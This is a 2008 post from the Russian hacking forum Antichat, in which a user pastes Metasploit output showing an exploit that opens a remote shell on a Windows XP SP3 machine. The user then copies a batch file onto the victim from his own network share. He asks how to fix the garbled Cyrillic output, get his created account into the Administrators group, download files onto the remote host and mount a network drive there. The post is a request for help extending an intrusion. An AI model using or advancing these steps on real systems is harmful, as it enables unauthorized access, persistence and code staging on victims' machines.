ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости

Опции темы Поиск в этой теме Опции просмотра

кодировка шела metasploit
Старый 26.11.2008, 16:01
diakon2
Познающий
Провел на форуме:
145373

По умолчанию кодировка шела metasploit

[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian[*] Selected Target: Windows XP SP3 Russian (NX)[*] Triggering the vulnerability...[*] Command shell session 8 opened (10.1.0.91:35136 -> 10.1.0.38:4444)

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:\WINDOWS\system32>

>> copy \\10.1.0.91\1\1.bat c:\

copy \\10.1.0.91\1\1.bat c:\
¥ ©¤¥ á¥â¥¢®© ¯ãâì.
__________________________________________________ _________________________
chcp1251 не работает

в общем как с этим боротсья подскажите плиз
изза этого я думаю, не создается учетка в группе Администраторы, иочнее учетка создается но не присоедитняется к группе

еще если кто может то подскажите как на удаленной машине скачивать файлы по сети(фтп просьба не предлагать) меня интересует синтаксис copy и xcopy

еще интересно как подключить сетевой диск на удаленной машине чтобы я копировал как с локального диска
вроде пока вопросов больше нет

если кто подскажет буду крайне благодарен, любой информации, а пока пойду гуглить

пс. находил все необходимые команды, но они потерялись, помню что они короткие (не более 10 символов на расшаривание диска с) причем оно реально работало, или подскажите как и где посмотреть логи MSF 3.2 запущенном на ubuntu.